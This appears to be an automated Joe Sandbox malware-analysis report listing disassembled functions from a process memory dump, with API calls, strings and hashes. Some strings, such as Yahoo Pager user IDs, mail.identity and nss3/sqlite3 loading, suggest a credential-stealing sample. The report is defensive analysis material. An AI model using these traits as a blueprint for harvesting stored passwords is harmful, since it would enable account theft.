                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                    • String ID:
                                                                                                    • API String ID: 1886415126-0
                                                                                                    • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                    • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                    • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                    • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                    Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen
                                                                                                    • String ID: >$>$>
                                                                                                    • API String ID: 39653677-3911187716
                                                                                                    • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                    • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                    • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                    • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                    Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                    • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                    • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                    • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                    • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                    Function 0044B40E Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                      • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1646373207-0
                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                    • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                    • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                    Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi
                                                                                                    • String ID: C@$mail.identity
                                                                                                    • API String ID: 1439213657-721921413
                                                                                                    • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                    • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                    • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                    • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                    Function 00444551 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00444573
                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValuememset
                                                                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                    • API String ID: 3363972335-1703613266
                                                                                                    • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                    • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                    • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                    • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                    Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00406640
                                                                                                      • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                    • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                    • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset$memcmp
                                                                                                    • String ID: Ul@
                                                                                                    • API String ID: 270934217-715280498
                                                                                                    • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                    • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                    • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                    • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                    Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                    Strings
                                                                                                    • recovered %d pages from %s, xrefs: 004188B4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                    • String ID: recovered %d pages from %s
                                                                                                    • API String ID: 985450955-1623757624
                                                                                                    • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                    • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                    • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                    • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                    Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _ultoasprintf
                                                                                                    • String ID: %s %s %s
                                                                                                    • API String ID: 432394123-3850900253
                                                                                                    • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                    • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                    • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                    • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                    Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                    • sprintf.MSVCRT ref: 0040909B
                                                                                                      • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                      • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                      • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                      • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                      • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                    • String ID: menu_%d
                                                                                                    • API String ID: 1129539653-2417748251
                                                                                                    • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                    • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                    • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                    • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                    Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _msizerealloc
                                                                                                    • String ID: failed memory resize %u to %u bytes
                                                                                                    • API String ID: 2713192863-2134078882
                                                                                                    • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                    • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                    • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                    • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                    Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
                                                                                                    • strrchr.MSVCRT ref: 00409808
                                                                                                    • _mbscat.MSVCRT ref: 0040981D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName_mbscatstrrchr
                                                                                                    • String ID: _lng.ini
                                                                                                    • API String ID: 3334749609-1948609170
                                                                                                    • Opcode ID: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                                    • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                    • Opcode Fuzzy Hash: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                                    • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                    Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                    • _mbscat.MSVCRT ref: 004070FA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscat$_mbscpystrlen
                                                                                                    • String ID: sqlite3.dll
                                                                                                    • API String ID: 1983510840-1155512374
                                                                                                    • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                    • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                    • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                    • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                    Function 004073CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                    • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow
                                                                                                    • String ID: MZ@
                                                                                                    • API String ID: 1378638983-2978689999
                                                                                                    • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                    • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                                                                    • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                    • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                                    Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString
                                                                                                    • String ID: A4@$Server Details
                                                                                                    • API String ID: 1096422788-4071850762
                                                                                                    • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                    • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                    • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                    • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                    Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                    • memset.MSVCRT ref: 0042C932
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 438689982-0
                                                                                                    • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                    • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                    • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                    • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                    Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • strlen.MSVCRT ref: 0040849A
                                                                                                    • memset.MSVCRT ref: 004084D2
                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,68137B60,?,00000000), ref: 0040858F
                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,68137B60,?,00000000), ref: 004085BA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3110682361-0
                                                                                                    • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                    • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                    • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                    • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                    Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3510742995-0
                                                                                                    • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                    • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                    • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                    • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8